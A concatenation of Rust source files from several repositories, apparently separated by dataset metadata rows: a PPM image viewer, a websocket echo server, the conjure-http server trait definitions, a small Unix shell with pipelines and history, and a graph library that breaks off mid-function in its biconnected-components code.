    let mut digits: Vec<u8> = vec![];
    let mut c: [u8; 1] = [0];
    // Consume whitespace; hitting EOF here means there is no number at all.
    loop {
        if cursor.read(&mut c)? == 0 {
            return Err("Parse error".into());
        }
        match &c {
            b" " | b"\t" | b"\n" => { },
            _ => { cursor.seek(std::io::SeekFrom::Current(-1))?; break; }
        }
    }
    // Accumulate digits; EOF simply terminates the number.
    loop {
        if cursor.read(&mut c)? == 0 {
            break;
        }
        match c[0] {
            b'0'..=b'9' => { digits.push(c[0]); },
            b' ' | b'\t' | b'\n' => { cursor.seek(std::io::SeekFrom::Current(-1))?; break; },
            _ => return Err("Parse error".into()),
        }
    }
    let num_str = std::str::from_utf8(&digits)?;
    let num = num_str.parse::<u32>()?;
    Ok(num)
}
fn decode_ppm_image(cursor: &mut Cursor<Vec<u8>>) -> Result<Image, Box<std::error::Error>> {
let mut image = Image {
width : 0,
height: 0,
pixels: vec![]
};
// read header
let mut c: [u8; 2] = [0; 2];
cursor.read(&mut c)?;
match &c {
b"P6" => { },
_ => { bail!("error") }
}
let w = read_num(cursor)?;
let h = read_num(cursor)?;
let cr = read_num(cursor)?;
print!("width: {}, height: {}, color range: {}\n", w, h, cr);
// TODO: Parse the image here
let mut pxls:Vec<Vec<Pixel>> = vec![];
let mut buff: [u8; 1] = [0];
loop{
cursor.read(&mut buff)?;
match &buff {
b" " | b"\t" | b"\n" => {},
_ => { cursor.seek(std::io::SeekFrom::Current(-1)); break; }
};
};
for x in 0..h {
let mut row: Vec<Pixel> = vec!();
for y in 0..w {
let mut mv: Vec<u8> = vec![];
for mut z in 0..3 {
mv.push(cursor.read_u8()?);
}
let px = Pixel {
R: mv[0] as u32,
G: mv[1] as u32,
B: mv[2] as u32
};
row.push(px);
}
pxls.insert(0, row);
}
image = Image {
width : w,
height: h,
pixels: pxls
};
Ok(image)
}
/// Entry point: loads the PPM file named on the command line, decodes it,
/// and displays it in an SDL window until the user closes it.
fn main()
{
    let args: Vec<String> = std::env::args().collect();
    if args.len() < 2 {
        eprintln!("Syntax: {} <filename>", args[0]);
        return;
    }
    let path = Path::new(&args[1]);
    let display = path.display();
    // NOTE(review): `description()` is deprecated; `{}` on the error itself
    // would print via Display instead.
    let mut file = match File::open(&path) {
        Err(why) => panic!("Could not open file: {} (Reason: {})",
            display, why.description()),
        Ok(file) => file
    };
    // read the full file into memory. panic on failure
    let mut raw_file = Vec::new();
    file.read_to_end(&mut raw_file).unwrap();
    // construct a cursor so we can seek in the raw buffer
    let mut cursor = Cursor::new(raw_file);
    // NOTE(review): `image` is never mutated afterwards; `mut` is unneeded.
    let mut image = match decode_ppm_image(&mut cursor) {
        Ok (img) => img,
        Err(why) => panic!("Could not parse PPM file - Desc: {}", why.description()),
    };
    show_image(&image);
}
| true |
c82b04237f89c7723f93a1045c030450a660d70a
|
Rust
|
gregscott94/gspos-server
|
/src/main.rs
|
UTF-8
| 2,183 | 2.890625 | 3 |
[] |
no_license
|
extern crate ws;
extern crate nickel;
use std::thread;
use std::time;
use std::env;
use ws::{listen, Handler, Sender, Result, Message, Handshake, CloseCode, Error};
use nickel::{Nickel, Mountable, StaticFilesHandler};
mod youtube;
/// Per-connection websocket handler; `out` can broadcast to all clients.
struct Server {
    out: Sender,
}
impl Handler for Server {
    fn on_open(&mut self, _: Handshake) -> Result<()> {
        Ok(println!("The client has connected"))
    }
    /// Echo server behavior: every incoming message goes to ALL clients.
    fn on_message(&mut self, msg: Message) -> Result<()> {
        // Echo the message to all connected clients
        self.out.broadcast(msg)
    }
    /// Logs why the peer disconnected; no per-connection cleanup is needed.
    fn on_close(&mut self, code: CloseCode, reason: &str) {
        match code {
            CloseCode::Normal => println!("The client is done with the connection."),
            CloseCode::Away => println!("The client is leaving the site."),
            CloseCode::Abnormal => println!(
                "Closing handshake failed! Unable to obtain closing status from client."),
            _ => println!("The client encountered an error: {}", reason),
        }
    }
    fn on_error(&mut self, err: Error) {
        println!("The server encountered an error: {:?}", err);
    }
}
/// Boots the websocket echo server on :3012 and, when the PROD_ENV
/// environment variable is set, a static-file HTTP router on :6767;
/// blocks until the spawned threads exit.
fn main() {
    let mut prod_env = "".to_string();
    let ws_server_thread = thread::Builder::new().name("ws_server".to_string()).spawn(move || {
        println!("Starting websocket server..");
        listen("127.0.0.1:3012", |out| { Server { out: out } }).unwrap()
    }).unwrap();
    // Give the websocket listener a moment to bind before continuing.
    thread::sleep(time::Duration::from_millis(1000));
    // PROD_ENV unset/unreadable means dev mode: skip the HTTP router.
    match env::var("PROD_ENV".to_string()) {
        Ok(val) => prod_env = val,
        Err(e) => println!("Operating in dev mode due to: {}", e),
    }
    if prod_env != "" {
        let app_router_thread = thread::Builder::new().name("app_router".to_string()).spawn(move || {
            let mut app_router = Nickel::new();
            println!("Starting app router..");
            app_router.mount("/controller/", StaticFilesHandler::new("app/controller/"));
            app_router.mount("/display/", StaticFilesHandler::new("app/display/"));
            app_router.listen("127.0.0.1:6767").unwrap();
        }).unwrap();
        let _ = app_router_thread.join();
    }
    let _ = ws_server_thread.join();
    println!("Server closing down..");
}
| true |
ff67828189d6c0c830be3ce881e876a9604364c1
|
Rust
|
svc-excavator-bot-org/conjure-rust
|
/conjure-http/src/server.rs
|
UTF-8
| 11,838 | 2.578125 | 3 |
[
"Apache-2.0"
] |
permissive
|
// Copyright 2019 Palantir Technologies, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//! The Conjure HTTP server API.
use crate::{PathParams, QueryParams};
use async_trait::async_trait;
use conjure_error::{Error, InvalidArgument};
use http::{HeaderMap, Method};
use serde::{Deserializer, Serialize};
use std::error;
use std::future::Future;
use std::io::Write;
use std::pin::Pin;
/// A trait implemented by synchronous endpoint handlers.
pub trait Handler<T, B, R>
where
    B: RequestBody,
    R: VisitResponse,
{
    /// Handles a synchronous request.
    fn handle(
        &self,
        service: &T,
        path_params: &PathParams,
        query_params: &QueryParams,
        headers: &HeaderMap,
        body: B,
        response_visitor: R,
    ) -> Result<R::Output, Error>;
}
/// A trait implemented by asynchronous endpoint handlers.
pub trait AsyncHandler<T, B, R>
where
    T: Sync + Send,
    B: RequestBody + Send,
    B::BinaryBody: Send,
    R: AsyncVisitResponse + Send,
{
    /// Handles an asynchronous request.
    ///
    /// Returns a boxed, pinned future so the trait needs no associated
    /// future type; the `'a` lifetime ties the future to the borrowed
    /// service and request parameters.
    fn handle<'a>(
        &self,
        service: &'a T,
        path_params: &'a PathParams,
        query_params: &'a QueryParams,
        headers: &'a HeaderMap,
        body: B,
        response_visitor: R,
    ) -> Pin<Box<dyn Future<Output = Result<R::Output, Error>> + Send + 'a>>
    where
        T: 'a,
        B: 'a,
        R: 'a;
}
/// A parameter of an endpoint.
#[derive(Copy, Clone, PartialEq, Debug)]
pub struct Parameter {
    name: &'static str,
    type_: ParameterType,
    safe: bool,
}
impl Parameter {
    // Builder-style: `new` defaults `safe` to false; `with_safe` overrides.
    /// Creates a new parameter.
    #[inline]
    pub const fn new(name: &'static str, type_: ParameterType) -> Parameter {
        Parameter {
            name,
            type_,
            safe: false,
        }
    }
    /// Sets the safety of the parameter.
    #[inline]
    pub const fn with_safe(mut self, safe: bool) -> Parameter {
        self.safe = safe;
        self
    }
    /// Returns the name of the parameter.
    #[inline]
    pub fn name(&self) -> &'static str {
        self.name
    }
    /// Returns the type of the parameter.
    #[inline]
    pub fn type_(&self) -> ParameterType {
        self.type_
    }
    /// Returns true if the parameter is safe for logging.
    #[inline]
    pub fn safe(&self) -> bool {
        self.safe
    }
}
/// The specific type of a parameter.
#[derive(Copy, Clone, PartialEq, Debug)]
pub enum ParameterType {
    /// A path parameter.
    Path(PathParameter),
    /// A query parameter.
    Query(QueryParameter),
    /// A header parameter.
    Header(HeaderParameter),
}
/// A path parameter.
// The private `(())` field prevents construction outside this module
// except through `new`, leaving room to add fields later.
#[derive(Copy, Clone, PartialEq, Debug)]
pub struct PathParameter(());
impl PathParameter {
    /// Creates a new path parameter.
    #[inline]
    pub const fn new() -> PathParameter {
        PathParameter(())
    }
}
/// A query parameter.
#[derive(Copy, Clone, PartialEq, Debug)]
pub struct QueryParameter {
    key: &'static str,
}
impl QueryParameter {
    /// Creates a new query parameter.
    #[inline]
    pub const fn new(key: &'static str) -> QueryParameter {
        QueryParameter { key }
    }
    /// Returns the key corresponding to this parameter in a URI's query.
    #[inline]
    pub fn key(&self) -> &'static str {
        self.key
    }
}
/// A header parameter.
#[derive(Copy, Clone, PartialEq, Debug)]
pub struct HeaderParameter {
    header: &'static str,
}
impl HeaderParameter {
    /// Creates a new header parameter.
    #[inline]
    pub const fn new(header: &'static str) -> HeaderParameter {
        HeaderParameter { header }
    }
    /// Returns the header corresponding to this parameter in an HTTP request.
    #[inline]
    pub fn header(&self) -> &'static str {
        self.header
    }
}
/// Information about an endpoint of a resource.
// Plain data holder: all fields are `'static` so a `Metadata` can be built
// in a `const` context by generated code.
pub struct Metadata {
    name: &'static str,
    method: Method,
    path: &'static str,
    parameters: &'static [Parameter],
    deprecated: bool,
}
impl Metadata {
    /// Creates a new metadata object.
    #[inline]
    pub const fn new(
        name: &'static str,
        method: Method,
        path: &'static str,
        parameters: &'static [Parameter],
        deprecated: bool,
    ) -> Metadata {
        Metadata {
            name,
            method,
            path,
            parameters,
            deprecated,
        }
    }
    /// Returns the endpoint's name.
    #[inline]
    pub const fn name(&self) -> &'static str {
        self.name
    }
    /// Returns the endpoint's HTTP method.
    #[inline]
    pub const fn method(&self) -> &Method {
        &self.method
    }
    /// Returns the endpoint's HTTP path template.
    #[inline]
    pub const fn path(&self) -> &'static str {
        self.path
    }
    /// Returns the endpoint's parameters.
    #[inline]
    pub const fn parameters(&self) -> &'static [Parameter] {
        self.parameters
    }
    /// Returns if the endpoint is deprecated.
    #[inline]
    pub const fn deprecated(&self) -> bool {
        self.deprecated
    }
}
/// A synchronous HTTP endpoint.
pub struct Endpoint<T, B, R>
where
    T: 'static,
    B: RequestBody + 'static,
    R: VisitResponse + 'static,
{
    /// Information about the endpoint.
    pub metadata: Metadata,
    /// The handler for the endpoint.
    pub handler: &'static (dyn Handler<T, B, R> + Sync + Send),
}
/// An asynchronous HTTP endpoint.
pub struct AsyncEndpoint<T, B, R>
where
    T: 'static,
    B: RequestBody + 'static,
    R: AsyncVisitResponse + 'static,
{
    /// Information about the endpoint.
    pub metadata: Metadata,
    /// The handler for the endpoint.
    pub handler: &'static (dyn AsyncHandler<T, B, R> + Sync + Send),
}
/// An HTTP resource.
///
/// The server-half of a Conjure service implements this trait.
// `I`/`O` are the server's binary request-body and response-writer types.
pub trait Resource<I, O>: Sized {
    /// The resource's name.
    const NAME: &'static str;
    /// Returns the resource's HTTP endpoints.
    // FIXME ideally this would be a &'static [Endpoint] once const fns become more powerful
    fn endpoints<B, R>() -> Vec<Endpoint<Self, B, R>>
    where
        B: RequestBody<BinaryBody = I>,
        R: VisitResponse<BinaryWriter = O>;
}
/// An asynchronous HTTP resource.
///
/// The server-half of a Conjure service implements this trait.
pub trait AsyncResource<I, O>: Sized + Sync + Send {
    /// The resource's name.
    const NAME: &'static str;
    /// Returns the resource's HTTP endpoints.
    // FIXME ideally this would be a &'static [Endpoint] once const fns become more powerful
    fn endpoints<B, R>() -> Vec<AsyncEndpoint<Self, B, R>>
    where
        B: RequestBody<BinaryBody = I> + Send,
        B::BinaryBody: Send,
        R: AsyncVisitResponse<BinaryWriter = O> + Send;
}
/// An HTTP request body.
pub trait RequestBody {
/// The binary body type.
type BinaryBody;
/// Accepts a visitor, calling the correct method corresponding to this body type.
fn accept<V>(self, visitor: V) -> Result<V::Output, Error>
where
V: VisitRequestBody<Self::BinaryBody>;
}
/// A visitor over request body formats.
///
/// Each default method rejects its body kind with an `InvalidArgument`
/// service error, so implementors only override the kinds they accept.
pub trait VisitRequestBody<T>: Sized {
    /// The output type returned by visit methods.
    type Output;
    /// Visits an empty body.
    ///
    /// The default implementation returns an error.
    fn visit_empty(self) -> Result<Self::Output, Error> {
        Err(Error::service_safe(
            "unexpected empty request body",
            InvalidArgument::new(),
        ))
    }
    /// Visits a serializable body.
    ///
    /// The default implementation returns an error.
    fn visit_serializable<'de, D>(self, deserializer: D) -> Result<Self::Output, Error>
    where
        D: Deserializer<'de>,
        D::Error: Into<Box<dyn error::Error + Sync + Send>>,
    {
        // Explicitly discard the argument to avoid an unused-variable warning.
        let _ = deserializer;
        Err(Error::service_safe(
            "unexpected serializable request body",
            InvalidArgument::new(),
        ))
    }
    /// Visits a streaming binary body.
    ///
    /// The default implementation returns an error.
    fn visit_binary(self, body: T) -> Result<Self::Output, Error> {
        let _ = body;
        Err(Error::service_safe(
            "unexpected binary request body",
            InvalidArgument::new(),
        ))
    }
}
/// An HTTP response.
pub trait Response<W> {
    /// Accepts a visitor, calling the correct method corresponding to the response type.
    fn accept<V>(self, visitor: V) -> Result<V::Output, Error>
    where
        V: VisitResponse<BinaryWriter = W>;
}
/// An asynchronous HTTP response.
pub trait AsyncResponse<W> {
    /// Accepts a visitor, calling the correct method corresponding to the response type.
    fn accept<V>(self, visitor: V) -> Result<V::Output, Error>
    where
        V: AsyncVisitResponse<BinaryWriter = W>;
}
/// A visitor over response body formats.
pub trait VisitResponse {
    /// The server's binary response body writer type.
    type BinaryWriter;
    /// The output type returned by visit methods.
    type Output;
    /// Visits an empty body.
    fn visit_empty(self) -> Result<Self::Output, Error>;
    /// Visits a serializable body.
    fn visit_serializable<T>(self, body: T) -> Result<Self::Output, Error>
    where
        T: Serialize + 'static;
    /// Visits a streaming binary body.
    fn visit_binary<T>(self, body: T) -> Result<Self::Output, Error>
    where
        T: WriteBody<Self::BinaryWriter> + 'static;
}
/// A visitor over asynchronous response body formats.
///
/// Mirrors [`VisitResponse`], with `Send` bounds so bodies can cross tasks.
pub trait AsyncVisitResponse {
    /// The server's binary response body writer type.
    type BinaryWriter;
    /// The output type returned by visit methods.
    type Output;
    /// Visits an empty body.
    fn visit_empty(self) -> Result<Self::Output, Error>;
    /// Visits a serializable body.
    fn visit_serializable<T>(self, body: T) -> Result<Self::Output, Error>
    where
        T: Serialize + 'static + Send;
    /// Visits a streaming binary body.
    fn visit_binary<T>(self, body: T) -> Result<Self::Output, Error>
    where
        T: AsyncWriteBody<Self::BinaryWriter> + 'static + Send;
}
/// A trait implemented by streaming bodies.
pub trait WriteBody<W> {
    /// Writes the body out, in its entirety.
    fn write_body(self, w: &mut W) -> Result<(), Error>;
}
/// A `Vec<u8>` body is written with a single `write_all` call; I/O failures
/// are wrapped as safe internal errors.
impl<W> WriteBody<W> for Vec<u8>
where
    W: Write,
{
    fn write_body(self, w: &mut W) -> Result<(), Error> {
        w.write_all(&self).map_err(Error::internal_safe)
    }
}
/// A trait implemented by asynchronous streaming bodies.
///
/// This trait can most easily be implemented with the [async-trait crate](https://docs.rs/async-trait).
///
/// # Examples
///
/// ```ignore
/// use async_trait::async_trait;
/// use conjure_error::Error;
/// use conjure_http::server::AsyncWriteBody;
/// use std::pin::Pin;
/// use tokio_io::{AsyncWrite, AsyncWriteExt};
///
/// pub struct SimpleBodyWriter;
///
/// #[async_trait]
/// impl<W> AsyncWriteBody<W> for SimpleBodyWriter
/// where
///     W: AsyncWrite + Send,
/// {
///     async fn write_body(self, mut w: Pin<&mut W>) -> Result<(), Error> {
///         w.write_all(b"hello world").await.map_err(Error::internal_safe)
///     }
/// }
/// ```
#[async_trait]
pub trait AsyncWriteBody<W> {
    /// Writes the body out, in its entirety.
    ///
    /// The writer is pinned so implementations can poll it directly.
    async fn write_body(self, w: Pin<&mut W>) -> Result<(), Error>;
}
| true |
3b21541fb0d7a307c80b771235b5007157ddd8ad
|
Rust
|
ravinderj/rush
|
/src/main.rs
|
UTF-8
| 2,606 | 2.625 | 3 |
[] |
no_license
|
extern crate chrono;
use std::env;
use std::fs::OpenOptions;
use std::io::{Error, Write};
use std::os::unix::process::ExitStatusExt;
use std::process::{Command, ExitStatus, Stdio, Child};
use rush::builtins::builtins;
use rush::input::*;
use rush::output::println_err;
use rush::rush::Rush;
use rush::utils::get_histfile_path;
fn main() {
    let greeting = "Welcome to RUSH.......";
    println!("{}", greeting);
    // REPL loop: read a line, run it, record the exit code in $STATUS,
    // then append the line to the history file.
    loop {
        // `input` is cloned because `save_history` takes ownership below.
        let input = read_line(build_prompt());
        match launch(Rush::from(input.clone())) {
            Ok(status) => {
                // A child killed by a signal has no exit code; $STATUS is
                // left unchanged in that case.
                if let Some(code) = status.code() {
                    env::set_var("STATUS", code.to_string())
                }
            }
            Err(_) => {
                // Spawn failure (e.g. unknown binary): shell convention 127.
                env::set_var("STATUS", 127.to_string());
                println_err("Command not found".to_owned())
            }
        }
        save_history(input);
    }
}
/// Builds the interactive prompt: the current working directory (lossily
/// decoded) immediately followed by the "≈>" marker.
fn build_prompt() -> String {
    let cwd = env::current_dir().unwrap();
    format!("{}≈>", cwd.to_string_lossy())
}
/// Dispatches one parsed command line.
///
/// Builtins take priority over external binaries; pipelines spawn each
/// stage with its stdout wired into the next stage's stdin.
fn launch(command: Rush) -> Result<ExitStatus, Error> {
    match command {
        Rush::Bin(cmd, args) => {
            // Prefer a builtin with this name; otherwise exec the program.
            builtins()
                .get(&cmd)
                .map_or_else(|| execute(cmd, args.clone()),
                             |builtin| builtin(args.clone()))
        }
        // Blank input: report success without running anything.
        Rush::Empty => Ok(ExitStatus::from_raw(0)),
        Rush::Piped(mut commands) => {
            let last = commands.pop();
            // Chain all but the last stage: each spawned child's stdout
            // becomes the next stage's stdin (the first stage inherits the
            // shell's stdin).
            let x = commands
                .iter()
                .fold(None, |r: Option<Child>, c| {
                    let stdin = r.map(|c| Stdio::from(c.stdout.unwrap()))
                        .unwrap_or(Stdio::inherit());
                    spawn_c(c, stdin, Stdio::piped())
                })
                .unwrap();
            // NOTE(review): the unwraps here panic on an empty pipeline or a
            // failed spawn — confirm the parser guarantees >= 2 stages.
            spawn_c(&last.unwrap(), Stdio::from(x.stdout.unwrap()), Stdio::inherit())
                .unwrap()
                .wait()
        }
    }
}
/// Spawns a single pipeline stage with the given stdio, or returns `None`
/// when `r` is not a plain binary invocation (or the spawn fails).
fn spawn_c(r: &Rush, stdin: Stdio, stdout: Stdio) -> Option<Child> {
    if let Rush::Bin(cmd, args) = r {
        spawn(cmd, args, stdin, stdout).ok()
    } else {
        None
    }
}
/// Runs an external command with inherited stdio and waits for completion.
///
/// Returns the child's exit status, or the I/O error from spawning/waiting.
fn execute(cmd: String, args: Vec<String>) -> Result<ExitStatus, Error> {
    // Propagate spawn failures with `?` instead of the original
    // `map(|mut c| c.wait())?` nested-Result construction, which was
    // correct but needlessly obscure.
    let mut child = spawn(&cmd, &args, Stdio::inherit(), Stdio::inherit())?;
    child.wait()
}
/// Spawns `cmd` with `args` and the supplied stdin/stdout handles;
/// stderr is inherited from the shell.
fn spawn(cmd: &String, args: &Vec<String>, stdin: Stdio, stdout: Stdio) -> Result<Child, Error> {
    let mut command = Command::new(cmd);
    command.args(args).stdin(stdin).stdout(stdout);
    command.spawn()
}
/// Appends `cmd` to the history file as `<unix-timestamp>;<command>\n`.
///
/// Empty commands are not recorded. Panics if the history file cannot be
/// opened or written, matching the surrounding code's unwrap style.
fn save_history(cmd: String) {
    if cmd.is_empty() {
        return;
    }
    let timestamp = chrono::Local::now().format("%s").to_string();
    let mut file = OpenOptions::new()
        .create(true).append(true)
        .open(get_histfile_path()).unwrap();
    // write_all guarantees the whole entry lands on disk; the original
    // `write` could silently drop bytes on a partial write.
    file.write_all((timestamp + ";" + cmd.as_str() + "\n").as_bytes()).unwrap();
}
| true |
15a1fd716818b53bc87ed0b02aeb89459750bdba
|
Rust
|
maxbannach/Fluid
|
/src/graph.rs
|
UTF-8
| 19,680 | 3.1875 | 3 |
[
"MIT"
] |
permissive
|
use std::collections::{HashSet, HashMap, VecDeque};
use std::mem;
use std::sync::atomic::AtomicBool;
// NOTE(review): global abort flag; no readers are visible in this file —
// presumably polled by long-running search code elsewhere. Confirm.
pub static GLOBAL_ABORT: AtomicBool = AtomicBool::new(false);
/// Undirected graph stored as adjacency lists, with a per-vertex position
/// index so `remove_neighbor` can delete an edge endpoint in O(1).
#[derive(Debug)]
pub struct Graph {
    pub n: usize, // vertices are 0,1,...,n.1 (Some might get removed later on)
    pub neighbors: Vec<Vec<usize>>, // neighbors of vertex i
    neighbors_pos: Vec<HashMap<usize, usize>>,// At which position of the neighbor[i] vector is vertex v?
}
impl Graph {
/// Allocate memory for a graph with n vertices.
///
pub fn new(n: usize) -> Graph {
Graph{
n: n,
neighbors: vec![Vec::new(); n],
neighbors_pos: vec![HashMap::new(); n],
}
}
    /// Deep copy of the graph.
    // NOTE(review): equivalent to what `#[derive(Clone)]` would produce;
    // kept as an explicit method because callers use `myclone`.
    pub fn myclone(&self) -> Graph {
        Graph{
            n: self.n,
            neighbors: self.neighbors.clone(),
            neighbors_pos: self.neighbors_pos.clone(),
        }
    }
/// Add the undirected edge {u,v} to the graph.
///
/// *Assumes:*
/// - u,v in {0,...,n-1}
/// - {u,v} not already present in the graph
///
pub fn add_edge(&mut self, u: usize, v: usize) {
self.neighbors[u].push(v);
self.neighbors[v].push(u);
self.neighbors_pos[u].insert(v, self.neighbors[u].len() - 1);
self.neighbors_pos[v].insert(u, self.neighbors[v].len() - 1);
}
    // Remove vertex from graph.
    // Returns the neighbors, that have a degree of zero and of one after
    // this removal. Note: the information about deg zero nodes is crucial,
    // since there is no way to distinguish these isolated nodes from formerly
    // removed nodes.
    // NOTE(review): self.neighbors_pos[v] keeps stale entries afterwards —
    // apparently harmless because v is never looked up again; confirm.
    pub fn remove_vertex(&mut self, v: usize) -> (Vec<usize>, Vec<usize>) {
        let mut deg_zero = vec![];
        let mut deg_one = vec![];
        // To avoid mutability issues with the iterator, we move the neighbor vector of v
        // and replace it with an empty one (since v gets removed).
        let vneigh = mem::replace(&mut self.neighbors[v], Vec::new());
        // Remove v in the neighbor lists.
        for &w in vneigh.iter() {
            self.remove_neighbor(w, v);
            // Classify w by its new degree so callers can react (e.g. prune).
            if self.neighbors[w].len() == 0 {
                deg_zero.push(w);
            } else if self.neighbors[w].len() == 1 {
                deg_one.push(w);
            }
        }
        (deg_zero, deg_one)
    }
    // Remove all edges that go to the given component.
    // Returns (new degree-zero vertices, new degree-one vertices) like
    // `remove_vertex`; v itself is reported when it drops to degree one.
    pub fn separate_vertex(&mut self, v: usize, component: &HashSet<usize>) -> (Vec<usize>, Vec<usize>) {
        let mut deg_zero = vec![];
        let mut deg_one = vec![];
        // To avoid mutability issues with the iterator, we move the neighbor vector of v
        // and replace it with an empty one (since v gets removed).
        let vneigh = mem::replace(&mut self.neighbors[v], Vec::new());
        //self.neighbors_pos[v] = HashMap::new();
        // Remove v in the neighbor lists.
        for &w in vneigh.iter() {
            if component.contains(&w) {
                // Edge into the component: drop it on w's side too.
                self.remove_neighbor(w, v);
                if self.neighbors[w].len() == 0 {
                    deg_zero.push(w);
                } else if self.neighbors[w].len() == 1 {
                    deg_one.push(w);
                }
            } else {
                // Edge survives: re-insert it into v's (rebuilt) adjacency.
                self.neighbors[v].push(w);
                self.neighbors_pos[v].insert(w, self.neighbors[v].len() - 1);
            }
        }
        // NOTE(review): v is not reported in deg_zero when all of its edges
        // were cut — confirm callers don't depend on that case.
        if self.neighbors[v].len() == 1 {
            deg_one.push(v);
        }
        (deg_zero, deg_one)
    }
    // Remove neighbor v in the neighbor list of w, in O(1): swap-remove by
    // moving the last neighbor into v's slot and updating the position map.
    pub fn remove_neighbor(&mut self, w: usize, v: usize) {
        // Where is v in neighbors[w]? This position will be free.
        // (No-op when v is not currently a neighbor of w.)
        let v_pos = match self.neighbors_pos[w].remove(&v) {
            Some(v_pos) => v_pos,
            None => return
        };
        // Move the last element to v_pos...
        let last = match self.neighbors[w].pop() {
            Some(v) => v,
            None => return
        };
        // ... if it is not v itself.
        if last != v {
            self.neighbors[w][v_pos] = last;
            // Update position of "last" element.
            self.neighbors_pos[w].insert(last, v_pos);
        }
    }
pub fn number_of_edges(&self, vertices: &[usize]) -> usize {
let mut cnt = 0;
for &v in vertices {
cnt += self.neighbors[v].len();
}
cnt / 2
}
    /// Iterative depth-first search from `start_at`; returns the DFS tree
    /// edges (parent, child) in the order vertices are first discovered.
    pub fn dfs_edges(&self, start_at: usize) -> Vec<(usize, usize)> {
        let mut edges: Vec<(usize,usize)> = Vec::new();
        let mut stack = Vec::new();
        let mut visited = HashSet::new();
        visited.insert(start_at);
        // The stack holds (vertex, iterator over its remaining neighbors) so
        // a vertex can be resumed after one of its children was explored.
        stack.push( (start_at, self.neighbors[start_at].iter()) );
        while let Some((u, mut neigh_iter)) = stack.pop() {
            // Find next child.
            let v = match neigh_iter.next() {
                Some(&v) => v,
                None => {
                    continue;
                }
            };
            // Put iterator back to the stack.
            stack.push((u, neigh_iter));
            if visited.contains(&v) {
                continue;
            }
            visited.insert(v);
            stack.push((v, self.neighbors[v].iter()));
            edges.push((u, v));
        }
        edges
    }
pub fn bfs_edges(&self, start_at: usize) -> Vec<(usize, usize)> {
let mut edges = Vec::new();
let mut queue = VecDeque::with_capacity(self.n);
let mut visited = HashSet::new();
visited.insert(start_at);
queue.push_back(start_at);
while let Some(u) = queue.pop_front() {
for &v in self.neighbors[u].iter() {
if visited.contains(&v) {
continue;
}
visited.insert(v);
queue.push_back(v);
edges.push((u,v));
}
}
edges
}
    /// Connected components of the subgraph induced by `vertices`,
    /// each returned as the list of its vertices.
    pub fn connected_components(&self, vertices: &[usize]) -> Vec<Vec<usize>> {
        let mut visited = HashSet::new();
        let mut comps = Vec::new();
        for &v in vertices {
            if visited.contains(&v) {
                continue;
            }
            // v starts a new component; DFS collects everything reachable.
            let mut comp = vec![v];
            visited.insert(v);
            for (_v, w) in self.dfs_edges(v) {
                comp.push(w);
                visited.insert(w);
            }
            comps.push(comp);
        }
        comps
    }
    /// Components (restricted to `vert_set`) containing the vertices of
    /// `to_be_reached`. Returns an empty vec as a fast "all connected"
    /// signal: when fewer than two targets exist, or when every target is
    /// swallowed by the very first component discovered.
    pub fn connected_subset_test(&self, vert_set: &HashSet<usize>, mut to_be_reached: HashSet<usize>) -> Vec<Vec<usize>> {
        if to_be_reached.len() <= 1 {
            return vec![];
        }
        let mut comps = Vec::new();
        let mut visited = HashSet::new();
        while let Some(&v) = to_be_reached.iter().next() {
            // NOTE(review): visited vertices are always removed from
            // to_be_reached below, so this guard looks unreachable (and would
            // loop forever if hit, since v is not removed here) — confirm.
            if visited.contains(&v) {
                continue;
            }
            let mut comp = vec![v];
            visited.insert(v);
            to_be_reached.remove(&v);
            let mut queue = VecDeque::new();
            queue.push_back(v);
            // BFS inside vert_set, ticking targets off as they are found.
            while let Some(u) = queue.pop_front() {
                for &w in self.neighbors[u].iter() {
                    if !vert_set.contains(&w) {
                        continue;
                    }
                    if visited.contains(&w) {
                        continue;
                    }
                    if to_be_reached.remove(&w) {
                        // All targets found inside the first component:
                        // they are mutually connected, report "nothing split".
                        if to_be_reached.len() == 0 && comps.len() == 0 {
                            return vec![];
                        }
                    }
                    comp.push(w);
                    visited.insert(w);
                    queue.push_back(w);
                }
            }
            comps.push(comp);
        }
        comps
    }
    /// BFS-based connected components of `vertices`, where `forbidden`
    /// vertices are treated as already visited (i.e. excluded / blocking).
    pub fn connected_components_subgraph(&self, vertices: &[usize], forbidden: HashSet<usize>) -> Vec<Vec<usize>> {
        // Seeding `visited` with the forbidden set excludes those vertices
        // from every component without an extra membership test.
        let mut visited = forbidden;
        let mut comps = Vec::new();
        let mut queue = VecDeque::new();
        for &v in vertices {
            if visited.contains(&v) {
                continue;
            }
            let mut comp = vec![v];
            visited.insert(v);
            queue.push_back(v);
            while let Some(u) = queue.pop_front() {
                for &w in self.neighbors[u].iter() {
                    if visited.contains(&w) {
                        continue;
                    }
                    comp.push(w);
                    visited.insert(w);
                    queue.push_back(w);
                }
            }
            comps.push(comp);
        }
        comps
    }
//fn articulation_points(vertices: &usize) -> Vec<usize> {
//fn biconnected_components(vertices: &usize) -> Vec<Vec<usize>> {
// self._biconnected_dfs(vertices)
//}
    /// Returns the articulation points and the vertex sets of the
    /// biconnected components of the subgraph induced by `vertices`.
    pub fn biconnected_components(&self, vertices: &[usize]) -> (HashSet<usize>, Vec<HashSet<usize>>) {
        let (articulation, comp_edges) = self._biconnected_dfs(vertices, true);
        let art_set = articulation.iter().cloned().collect();
        // Flatten each component's edge list into its vertex set.
        let mut components = vec![];
        for edges in comp_edges.iter() {
            let mut comp = HashSet::new();
            for (u,v) in edges.iter() {
                comp.insert(*u);
                comp.insert(*v);
            }
            components.push(comp);
        }
        (art_set, components)
    }
    /// Iterative low-link DFS computing articulation points and — when
    /// `compute_components` is set — the edge lists of the biconnected
    /// components. `discovery` records first-visit times; `low` the lowest
    /// discovery time reachable via back edges from each subtree.
    pub fn _biconnected_dfs(&self, vertices: &[usize], compute_components: bool) -> (Vec<usize>, Vec<Vec<(usize, usize)>>) {
        // depth-first search algorithm to generate articulation points
        // and biconnected components
        let mut components = vec![];
        let mut articulation = vec![];
        let mut visited = HashSet::new();
        for &start in vertices.iter() {
            if visited.contains(&start) {
                continue;
            }
            let mut discovery = HashMap::new();
            discovery.insert(start, 0); // "time" of first discovery of node during search
            let mut low = HashMap::new();
            low.insert(start, 0);
            let mut root_children = 0;
            visited.insert(start);
            let mut edge_stack = vec![];
